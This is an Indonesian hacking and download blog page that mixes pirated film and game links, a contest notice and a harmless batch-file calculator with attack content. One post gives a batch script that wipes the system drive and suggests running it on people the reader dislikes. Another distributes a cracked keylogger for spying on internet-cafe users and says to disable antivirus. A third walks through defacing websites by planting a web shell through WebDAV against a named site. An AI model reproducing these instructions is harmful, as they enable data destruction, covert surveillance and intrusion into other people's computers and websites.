Pasang iklan Anda di sini.
http://goo.gl/ad3AU2

24 Free Download Film Crows Zero I + Subtitle Bahasa Indonesia

Kamis, Mei 30, 2013
Free Download Film Crows Zero I + Subtitle Bahasa Indonesia | Cirebon-Cyber4rt - Sore sob, setelah lama ngga posting karena kesibukan saya di dunia nyata, kali ini saya akan sempatkan posting lagi. Dan kali ini saya akan share sebuah film action dari Jepang yang berjudul Crows Zero.

Free Download Film Crows Zero I + Subtitle Bahasa Indonesia
Crows Zero

Film Crows Zero I ini menceritakan sebuah sekolah yang dimana menuntut siswanya menjadi yang terkuat. Disini yang menjadi aktor utamanya adalah Takiya Genji, seorang anak bos Yakuza yang pindah ke Suzuran demi menggantikan posisi ayahnya.

Perjuangan Genji untuk menjadi Raja Suzuran tidaklah mudah, karena dia harus melawan Serizawa sang Pemimpin Suzuran dan Rindaman, orang yang paling ditakuti disana. Penasaran dengan cerita selanjutnya? Ok, sebaiknya tonton filmnya, biar lebih seru hehehe.

Screenshoot :
Free Download Film Crows Zero I + Subtitle Bahasa Indonesia

Free Download Film Crows Zero I + Subtitle Bahasa Indonesia

Free Download Film Crows Zero I + Subtitle Bahasa Indonesia

Download Link :
Sekian postingan saya kali ini tentang Free Download Film Crows Zero I + Subtitle Bahasa Indonesia, semoga dapat bermanfaat.

Credits: Indowebster



22 Free Download Film Warkop DKI: Sabar Dulu Dong DVDRip

Senin, Mei 20, 2013
Free Download Film Warkop DKI: Sabar Dulu Dong... DVDRip | Cirebon-Cyber4rt - Siang sob, semoga kalian ga bosen mampir kesini :) Siang kali ini saya akan memposting sebuah film Warkop DKI yang berjudul "Sabar Dulu Dong" yang dirilis pada tahun 1989.

Memang Warkop DKI sudah menjadi icon grup lawak di Indonesia, karena lawakan-lawakan jenaka mereka saat ini banyak digunakan oleh pelawak zaman sekarang, contoh lawakan OVJ dll. Berikut link download film Warkop DKI - Sabar Dulu Dong.

Warkop DKI - Sabar Dulu Dong
Download Film Warkop DKI: Sabar Dulu Dong

Download Link ( Indowebster ) :
Dono, Kasino, Indro.

Pemeran Pendukung :
Eva Arnaz, Anna Sherley, Ruth Peluppesy dll.

Sekian postingan saya kali ini tentang Free Download Film Warkop DKI: Sabar Dulu Dong DVDRip, semoga dapat bermanfat. Saya mohon maaf kalo linknya repost punya orang lain, karena waktu yang terbatas untuk mengupload dan koneksi internet juga tidak memungkinkan :D

Sekian dan Wassalam.



23 Cara Merusak System Windows XP dengan Notepad

Senin, Mei 20, 2013
Cara Merusak Windows XP dengan Notepad | Cirebon-Cyber4rt - Pada hari jum'at yang berbahagia ini saya akan share sebuah trick jail atau bisa dibilang jahat karena trick ini sifatnya merusak dan merugikan orang lain.

Cara Merusak System Windows XP dengan Notepad
Microsoft Windows XP

Apabila kalian punya teman atau kenalan yang kurang kalian sukai, mungkin karena dia suka pinjem duit ke kalian, suka telat bayar utang dll :p coba kalian pake cara ini buat ngerjain tuh si doi ( kalo dia punya PC ya... ) hehehee.

Trick ini sebenarnya sangatlah simple, kalian cukup menggunakan notepad dan imajinasi kalian. Berikut cara merusak system windows xp dengan notepad.

Tutorial :
1). Buka notepad lalu copy-paste script dibawah ini :

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

2). Simpan dengan extensi .bat

Cara menggunakannya cukup dengan Double-click pada file yang sudah kalian buat tadi, dan jangan heran kalo komputer/laptop kalian akan mati dan saya juga kurang tau bagaimana cara mengatasi windows xp yang sudah dirusak oleh notepad ber-script ini :p

Saya tidak bertanggung jawab apabila terjadi kerusakan pada komputer atau laptop!

Jalan terakhir untuk mengembalikan komputer/laptop yang mati ini mungkin adalah Install ulang =)) Jadi kalian pikirin baik-baik untuk tidak mencobanya di Komputer atau Laptop pribadi.

Sekian postingan saya kali ini yang membahas tentang Cara Merusak System Windows XP dengan Notepad, semoga dapat bermanfaat.




72 Free Download Perfect Keylogger v1.7 + Serial Number

Rabu, Mei 15, 2013
Free Download Perfect Keylogger v1.7 + Serial Number | Cirebon-Cyber4rt - Pada malam kali ini saya akan share sebuah software pengintai aktifitas komputer atau dalam bahasa kerennya keylogger. Keylogger ada banyak jenis dan namanya, walaupun berbeda-beda, namun tujuan keylogger itu semuanya sama "Merekam aktifitas pengguna".

Free Download Perfect Keylogger v1.7 + Serial Number
Perfect Keylogger

Nah, keylogger yang akan saya share kali ini adalah PERFECT KEYLOGGER v1.7. Dalam penggunaannya keylogger ini sangatlah user friendly, tampilannya yang simple membuat kita dapat langsung mengerti cara-cara penggunaannya.

Screenshot :
Free Download Perfect Keylogger v1.7 + Serial Number

Free Download Perfect Keylogger v1.7 + Serial Number

Download Link :
Cara Agar Full Version :
  1. Download kemudian Instal i_bpk2009
  2. Jika sudah terinstal, buka Perfect Keylogger pada menu Try icon.
  3. Nah masukan Nama dan Serial Number
  4. Sekarang Perfect Keylogger kalian sudah full version.
  5. Enjoy spy!
Cara Penggunaan pasti sudah pada ngertilah, gunakan imajinasi kalian :p Mudah kok, kalian tinggal atur-atur sendiri ajah, kalo mau mode send email yaa tinggal atur alamat email yang mau dijadiin ladang dll.

Ok, gunakan dengan bijak! saya sarankan kalo hati-hati bagi kalian yang mau naruh Perfect Keylogger ini di WARNET! soalnya kalo sampe ketahuan Operator Warnetnya, kalian bisa-bisa pulang tinggal nama wakwakwak =))

Catatan :
Karena sebagian Anti-virus mendeteksi keylogger ini adalah virus, jadi sebelum mendownload dan menginstal Perfect Keylogger... matikan dulu Anti-virus yang ada di PC kalian.

Sekian postingan saya kali ini tentang Free Download Perfect Keylogger v1.7 + Serial Number, semoga dapat bermanfaat.




24 Cara Membuat Kalkulator Sederhana dengan Notepad

Rabu, Mei 15, 2013
Cara Membuat Kalkulator Sederhana dengan Notepad | Cirebon-Cyber4rt - Hallo sob, kali ini kita akan bermain-main dengan notepad lagi, setelah sebelumnya saya posting tentang cara membuat tools DDos dari notepad.

Cara Membuat Kalkulator Sederhana dengan Notepad
Simple Calculator

Pada dasarnya notepad sangatlah berguna walaupun jarang orang ketahui, dengan notepad kita bisa membuat sebuah program sederhana misalnya kalkulator. Penasaran? ok, masi kita simak tutorial cara membuat kalkulator sederhana dengan notepad.

Tutorial Cara Membuat Kalkulator dari Notepad:
1). Buka notepad, lalu copy-paste script dibawah ini kedalam notepad.

======================================
@echo off
title Calculator by : Cirebon-Cyber4rt
:ulang
echo ./Enjoy It!
set /p A=Masukkan Angka Pertama =
set /p B=Masukkan Angka Kedua =
set /p o=Pilih pengoperasian anda (*, +, -, /) =
set /a "jumlah" = A%o%B
echo Jumlah = %jumlah%
pause>null
goto ulang
======================================

Seperti ini :
Cara Membuat Kalkulator Sederhana dengan Notepad

2). Kemudian Save as dengan extensi .bat dan ubah tipe filenya menjadi all files.

Cara Membuat Kalkulator Sederhana dengan Notepad

3). Untuk mulai mengoperasikan kalkulator buatan kita tadi, caranya double click file berextensi .bat yang kamu buat tadi kemudian masukan nominalnya lalu tekan enter.

Cara Membuat Kalkulator Sederhana dengan Notepad

Cukup mudahkan hehehe... memang cara ini terbilang agak ribet, tapi apa salahnya mencoba untuk sekedar menambah wawasan kita. Si imut notepad sudah tidak bisa dianggap sebelah mata, biarpun keliatannya kecil namun manfaatnya sangatlah besar :D

Sekian postingan saya kali ini tentang Cara Membuat Kalkulator Sederhana dengan Notepad, semoga dapat bermanfaat.




135 Cara Deface Website Dengan Webdav Shell Maker | Hmei7

Rabu, Mei 15, 2013
Cara Deface Website Dengan Webdav Shell Maker | Cirebon-Cyber4rt - Malam sob, ngga terasa sudah lama ngga posting tentang hacking hehee. Ada beberapa hal yang membuat saya vacum dari dunia blog selama hampir 2 bulan ini. Selain jadwal jumpa fans yang padat, saya juga sedang fokus untuk masuk perguruan tinggi.

Cara Deface Website Dengan Webdav Shell Maker | Hmei7
Webdav Shell Maker

Ok deh langsung saja ke inti postingan kali ini, o'ya! disini saya hanya memberikan tutorial untuk pembelajaran. Bukan sok2'an jadi heker, cracker, ceker atau apalah, saya hanya ingin berbagi karena Berbagi Itu Indah ( Mbah Qopet's Quote ) :p

Dengan menggunakan sebuah tools hacking buatan Hmei7 kita dapat dengan mudah menanam shell ke dalam sebuah website, dan dengan begitu kita dapat melakukan apa saja terhadap web yang kita tanami shell tersebut.

Sebelumnya soba harus mendowload tools Webdav Shell Maker'nya. Dibawah sudah saya siapkan link downloadnya.

Download Link :
  • Webdav Shell Maker: 4Shared | 70 KB
  • Shell | 10 KB
  • Password :   
Tutorial Deface Web dengan Webdav Shell Maker :
1). Download kemudian extract file ls-rootkit.Rar
2). Buka tools webdav yang sudah di download tadi, klik menu tab 'WebDav' lalu pilih 'Asp shell maker'.

Cara Deface Website Dengan Webdav Shell Maker | Hmei7

3). Buka menu Setting, pada menu setting Name of your shell bisa diubah dengan nama kamu, kemudian Load Shell from file, pilih shell Umer.asp;

Cara Deface Website Dengan Webdav Shell Maker | Hmei7

4). Selanjutnya, pilih Add site, disini saya menggunakan target http://fpzbtc.com/ lalu klik OK.

Cara Deface Website Dengan Webdav Shell Maker | Hmei7

5). Klik Serang !!!, lalu tunggu hingga scanning web selesai, jika shell berhasil tertanam, tampilannya akan seperti ini, klik OK.

Cara Deface Website Dengan Webdav Shell Maker | Hmei7

6). Block http://fpzbtc.com/Cirebon.asp;.txt lalu Copy dan Pastekan pada Addressbar Browser kalian, kemudian tekan Enter.

Cara Deface Website Dengan Webdav Shell Maker | Hmei7

7). Jika sudah masuk website target, klik UPLOAD FILE TO Blablabla,

Cara Deface Website Dengan Webdav Shell Maker | Hmei7

8). Pilih scipt .html deface'an kamu, kemudian klik Upload!

Cara Deface Website Dengan Webdav Shell Maker | Hmei7

9). Tahap akhir, copy file .html yang sudah kamu upload tadi lalu pastekan dibelakang Url website target.

Cara Deface Website Dengan Webdav Shell Maker | Hmei7

10). Enter dan lihat hasilnya!

Cara Deface Website Dengan Webdav Shell Maker | Hmei7

Jika ingin mendeface seluruh halaman, kamu tinggal RENAME file kamu dengan Index.html, atau istilahnya tukar-menukar file .html ( Cari file bernama Index.html atau sejenisnya, delete file tersebut lalu Rename file upload'an kamu menjadi Index.html ) Gimana, ngerti ngga? harus ngerti!

Kalo menurut saya jangan nyerang Index nya deh, kasian adminnya... mending nitip file .html aja, kalo emang kamu hati nurani :p

Tidak semua website rentan atau mempunyai celah/vuln, jadi kalo belum berhasil... cari website lain yang bisa ditanami shell dengan tools ini, jika ingin praktis berikut List Website Vuln Terhadap WebDav. Jika masih ada yang belum dipahami, kalian bisa hubungi via facebook atau mention twitter saya.

Catatan:
Matikan Anti-virus ketika mendownload dan pada saat menggunakan tools WebDav ini, Anti-virus mendeteksi tools ini sebagai virus.

Sekian postingan saya kali ini tentang Cara Deface Website Dengan Webdav Shell Maker | Hmei7 semoga dapat bermanfat bagi kalian, wassalam.




17 Free Download Game JURIG ESCAPE: Indonesian Horror Game

Selasa, Mei 14, 2013
Download Game JURIG ESCAPE: Indonesian Horror Game | Cirebon-Cyber4rt - Malem sob, disela-sela waktu luang yang saya punya hari ini, saya sempatkan buat ngeblog. Dan kali ini saya akan share sebuah game horor buatan anak Indonesia.

Download Game JURIG ESCAPE: Indonesian Horror Game
Jurig Escape

Nama game-nya Jurig Escape, game ini asli buatan orang Indonesia, dalam game ini kita ditugaskan untuk melawan hantu yang tentunya hantu khas Indonesia juga seperti Pocong dan Kuntilanak.Kalo menurut saya game ini mirip dengan game Left 4 Dead tapi bedanya dalam game Jurig Escape ini kita hanya sendirian, sereem deh pokoknya...

Game ini sudah lama dirilis, dan sebetulnya sudah lama juga saya upload ke hostingan, tapi baru sempet dishare sekarang. Ok, jangan lama-lama berikut detail tentang game Jurig Escape.

Screenshoot :
Free Download Game JURIG ESCAPE: Indonesian Horror Game

Free Download Game JURIG ESCAPE: Indonesian Horror Game

Free Download Game JURIG ESCAPE: Indonesian Horror Game

Sistem Rekomendasi :
  • OS: Microsoft Windows XP , Vista , 7
  • CPU: Intel Pentium 4 ( 2.8 GHz )
  • Memory of RAM 1 GB
  • DirectX 9.0c
  • Input: Keyboard and Mouse.
Download Link :
Game Jurig Escape ini sangat cocok buat kalian yang suka sekali dengan adrenalin, karena efek suara yang dihasilkan oleh game ini lumayan bikin bulu kuduk berdiri lho... dan grafik game juga sudah lumayan, ga kalah deh dengan game Resident Evil :p

Sekian dulu postingan saya kali ini, semoga game Jurig Escape ini bisa menghibur kalian, dan sebelumnya saya mohon maaf apabila komentar kalian diblog ini belum bisa dijawab oleh saya, trimakasih.




17 Kontes Tabloid Pulsa 2013 dalam Rangka Ulang Tahun Ke-10

Sabtu, Mei 11, 2013
Kontes Tabloid Pulsa 2013 dalam Rangka Ulang Tahun Ke-10 | Cirebon-Cyber4rt - Ada kabar gembira bagi kamu yang suka ikutan kontes. Kali ini Tabloid Pulsa, salah satu website review handphone mengadakan sebuah kontes dalam rangka menyambut ulang tahunnya yang ke-10.

Tentunya lumayan juga ikutan kontes ini, karena dalam kontes ini cara bermainnya sangat mudah, kita tinggal daftar, ikuti gamesnya lalu dapetin hadiahnya.

Tabloid PULSA

Hadiahnya juga lumayan gan, Ada Blackberry Z10, Samsung Galaxy S IV, Nokian Lumia 920, IMO Tablet Z7 Orion, IMO New Smartphone S89 Miracle dan masih banyak lagi gan.

Kontes ini berlangsung dari tanggal 26 April - 26 Mei 2013, wah bentar lagi mau kelar gan, jadi buruan, tunggu apalagi? Daftar Sekarang!

Cara Mainnya :
  1. Masuk ke Website Tabloid Pulsa
  2. Kemudian klik tombol Daftar disudut atas bagain kanan
  3. Isi Formulirnya, Username, Email, No. Hp dll
  4. Langkah terakhir cek Email yang agan pake buat daftar tadi.
  5. Klik link konfirmasi pendaftaran yang ada didalam email,
  6. Kemudian login.
Mainkan gamesnya dan kumpulkan point sebanyak-banayaknya, karena siapa tau kamu yang bakal beruntung mendapat salah satu hadiahnya!




Contact

Nama

Email *

Pesan *